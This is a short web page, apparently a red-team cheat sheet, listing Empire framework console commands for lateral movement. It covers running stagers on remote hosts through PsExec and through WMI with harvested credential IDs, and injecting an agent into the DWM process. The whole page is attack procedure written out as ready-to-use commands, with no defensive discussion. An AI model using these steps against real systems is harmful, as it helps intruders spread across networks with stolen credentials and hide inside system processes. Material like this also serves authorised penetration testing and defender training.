top of page

 3. LATERAL MOVEMENT  

 Execute a stager on remote hosts using PsExec  

(empire: agentname) > creds

(empire: agentname) > usemodule lateral_movement/invoke_psexec

(empire: agentname) > info

(empire: agentname) > set Listener [listenername]               

(empire: agentname) > set ComputerName [ipoftgt]                (Ip address of target)

(empire: agentname) > execute

[if successful will create another agent ]

 Execute a stager on remote hosts using WMI  

(empire: agentname) > creds

(empire: agentname) > usemodule lateral_movement/invoke_wmi

(empire: agentname) > info

(empire: agentname) > set CredID  [number]                              (CredID from Creds )

(empire: agentname) > set Listener [listenername]               

(empire: agentname) > set ComputerName [ipoftgt]                (Ip address of target)

(empire: agentname) > execute

[if successful will create another agent ]

 Injecting into the DWM process  

(empire: agentname) > ps dwm

--------------------------------------------------------------------------------------------------------------------------------------

ProcessName                    PID         Arch                       Username                           Mem Using

dwm                                     612         x86                         xxxx                                       xxx

--------------------------------------------------------------------------------------------------------------------------------------

(empire: agentname) > psinject  listenername  [PID]

(empire: agentname) > execute

[if successful will create another agent ]

(empire: agentname) > back

(empire: agents) > list

(empire: agents) > interact  [nameofagent]

bottom of page